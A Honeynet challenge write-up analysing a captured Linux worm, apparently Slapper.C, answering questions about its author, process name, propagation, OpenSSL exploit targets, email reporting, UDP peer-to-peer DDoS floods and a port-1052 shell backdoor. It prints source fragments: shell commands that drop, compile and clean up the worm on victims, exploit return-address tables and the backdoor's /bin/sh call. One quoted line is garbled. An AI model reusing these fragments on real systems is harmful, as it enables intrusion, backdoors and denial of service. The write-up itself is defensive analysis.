Asby and N|ghtHawk of Mostly Harmless



The Challenge:

Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock), 
was used by the worm to infect the honeypot. Your mission is to analyze the captured file in 
order to answer the questions below. Be sure you review the submission rules at the SotM 
challenge page before submitting your results. 
Questions

1.  Which is the type of the .unlock file? When was it generated? 
2.  Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1? 
3.  Which process name is used by the worm when it is running? 
4.  In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, 

which files remain on the infected machine? 5. Which port is scanned by the worm? 6. Which vulnerability the worm tries to exploit? In which architectures? 7. What kind of information is sent by the worm by email? To which account? 8. Which port (and protocol) is used by the worm to communicate to other infected machines? 9. Name 3 functionalities built in the worm to attack other networks. 10. What is the purpose of the .update.c program? Which port does it use? Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?



Question 1: Which is the type of the .unlock file? When was it generated?

A. Which is the type of the .unlock file? 
  - gzip compressed data

	hawkeye@gw:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix

B. When was it generated? 
  - Fri Sep 20 12:59:04 2002

	hawkeye@gw:~/scan$ file .unlock
	.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 12:59:04 2002, os: Unix
Question 2: Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?

A. Based on the source code, who is the author of this worm? 
  - contem (contem@efnet)
  - modified by aion ([email protected])

	hawkeye@gw:~/scan$ head -4 .unlock.c |tail -2
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
	 *                         by contem@efnet                                  *
	hawkeye@gw:~/scan$ head -38 .unlock.c |tail -1
	 *  some modification done by aion ([email protected])                           *

B. When it was created?
  - Sep 20 15:28

	hawkeye@gw:~/scan$ ls -la |grep .unlock.c
	-rw-r--r--    1 hawkeye  hawkeye     70981 Sep 20 15:28 .unlock.c
 
C. Is it compatible with the date from question 1? 
  - No, the .unlock.c is from a later date than the .unlock file
	.unlock: Fri Sep 20 12:59:04 2002
	.unlock.c: Sep 20 15:28
Question 3: Which process name is used by the worm when it is running?

  - "httpd "

	hawkeye@gw:~/scan$ head -78 .unlock.c |tail -1
	#define PSNAME          "httpd "
Question 4: In wich format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?

A. In wich format the worm copies itself to the new infected machine? 

  - uuencoded

	hawkeye@gw:~/scan$ head -1416 .unlock.c |tail -1
	  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
	hawkeye@gw:~/scan$ head -1421 .unlock.c|tail -1
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "



B. Which files are created in the whole process? 
  - /tmp/.unlock.uu
  - /tmp/.unlock
  - /tmp/.unlock.c
  - /tmp/.update.c
  - /tmp/httpd
  - /tmp/update

	hawkeye@gw:~/scan$ head -1424 .unlock.c |tail -4
	  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
	                "tar xzf /tmp/.unlock -C /tmp/;              "
	                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
	                "gcc -o /tmp/update /tmp/.update.c;\n");


C. After the worm executes itself, wich files remain on the infected machine? 
  - /tmp/.unlock

	hawkeye@gw:~/scan$ head -1428 .unlock.c |tail -4
	  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
	 sleep(3);ockfd,rcv);
	  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
	                "       /tmp/httpd /tmp/update; exit; \n");
Question 5: Which port is scanned by the worm?

  - 80

	hawkeye@gw:~/scan$ head -67 .unlock.c |tail -1
	#define SCANPORT        80
Question 6: Which vulnerability the worm tries to exploit? In which architectures?

A. Which vulnerability the worm tries to exploit? 
  - openSSL

	hawkeye@gw:~/scan$ head -1141 .unlock.c |tail -4
	#include <openssl/ssl.h>
	#include <openssl/rsa.h>
	#include <openssl/x509.h>
	#include <openssl/evp.h>

B. In which architectures? 
  - Gentoo
  - Debian (1.3.26)
  - Red-Hat (1.3.6,1.3.9,1.3.12,1.3.19,1.3.20,1.3.22,1.3.23,1.3.26)
  - Suse (1.3.12,1.3.17,1.3.19,1.3.20,1.3.23)
  - Mandrake (1.3.14,1.3.19,1.3.20,1.3.23)
  - Slackware (1.3.26)

	hawkeye@gw:~/scan$ head -1269 .unlock.c |tail -25
	} architectures[] = {
	        {"Gentoo", "", 0x08086c34},
        	{"Debian", "1.3.26", 0x080863cc},
	        {"Red-Hat", "1.3.6", 0x080707ec},
        	{"Red-Hat", "1.3.9", 0x0808ccc4},
	        {"Red-Hat", "1.3.12", 0x0808f614},
        	{"Red-Hat", "1.3.12", 0x0809251c},
	        {"Red-Hat", "1.3.19", 0x0809af8c},
        	{"Red-Hat", "1.3.20", 0x080994d4},
	        {"Red-Hat", "1.3.26", 0x08161c14},
        	{"Red-Hat", "1.3.23", 0x0808528c},
	        {"Red-Hat", "1.3.22", 0x0808400c},
        	{"SuSE", "1.3.12", 0x0809f54c},
	        {"SuSE", "1.3.17", 0x08099984},
        	{"SuSE", "1.3.19", 0x08099ec8},
	        {"SuSE", "1.3.20", 0x08099da8},
        	{"SuSE", "1.3.23", 0x08086168},
	        {"SuSE", "1.3.23", 0x080861c8},
        	{"Mandrake", "1.3.14", 0x0809d6c4},
	        {"Mandrake", "1.3.19", 0x0809ea98},
	        {"Mandrake", "1.3.20", 0x0809e97c},
	        {"Mandrake", "1.3.23", 0x08086580},
	        {"Slackware", "1.3.26", 0x083d37fc},
	        {"Slackware", "1.3.26",0x080b2100}
	};
Question 7: What kind of information is sent by the worm by email? To which account?

A. What kind of information is sent by the worm by email? 
  - hostid
  - hostname
  - ip

	hawkeye@gw:~/scan$ head -124 .unlock.c |tail -3
	  sprintf(cmdbuf," hostid:   %d \r\n"
        	         " hostname: %s \r\n"
                	 " att_from: %s \r\n",gethostid(),buffer,sip);

B. To which account? 
  - [email protected]

	hawkeye@gw:~/scan$ head -77 .unlock.c |tail -1
	#define MAILTO          "[email protected]"
Question 8: Which port (and protocol) is used by the worm to communicate to other infected machines?

  - Port : 4156
  - Protocol : UDP

	hawkeye@gw:~/scan$ head -66 .unlock.c |tail -1
	#define PORT            4156
	hawkeye@gw:~/scan$ head -3 .unlock.c |tail -1
	 *           Peer-to-peer UDP Distributed Denial of Service (PUD)           *
Question 9: Name 3 functionalities built in the worm to attack other networks.

  - UDP flood
  - TCP flood (IPv4 and IPv6)
  - DNS flood

	hawkeye@gw:~/scan$ head -2205 .unlock.c |tail -1
	                                        case 0x29: { // Udp flood
	hawkeye@gw:~/scan$ head -2246 .unlock.c |tail -1
        	                                case 0x2A: { // Tcp flood
	hawkeye@gw:~/scan$ head -2279 .unlock.c |tail -1
        	                                case 0x2B: { // IPv6 Tcp flood
	hawkeye@gw:~/scan$ head -2308 .unlock.c |tail -1
        	                                case 0x2C: { // Dns flood
Question 10: What is the purpose of the .update.c program? Which port does it use?

A. What is the purpose of the .update.c program? 
  - .update.c listens on a port and will execute the command which it gets. It seems to be a password protected 
    backdoor. After the command is executed, the script exits, so it may be a way to rebackdoor the machine 
    with another backdoor.

	hawkeye@gw:~/scan$ head -66 .update.c|tail -4
        	        if( !strncmp(temp_buff,PASS,strlen(PASS)) )
                	  execl("/bin/sh","sh -i",(char *)0);
                	closeall();
                	exit(0);


B. Which port does it use?
  - 1052

	hawkeye@gw:~/scan$ head -4 .update.c|tail -1
	#define PORT      1052


Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

  - The SLEEPTIME lets the script sleep for 5 minutes (300 seconds), en the UPTIME lets the script listen to the port 
    for 10 seconds. This way the port wont seem to respons when people connect to it or try to use/scan it.

	hawkeye@gw:~/scan$ head -7 .update.c|tail -2
	#define SLEEPTIME 300          // sleep  5 min.
	#define UPTIME    10           // listen 10 sec.
	hawkeye@gw:~/scan$ head -52 .update.c|tail -1
        	for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);)
	hawkeye@gw:~/scan$ head -73 .update.c|tail -1
        	sleep(SLEEPTIME);

Conclusion

The .unlock file seems to be the Linux.Worm.Slapper.C.


Asby and N|ghtHawk
Mostly Harmless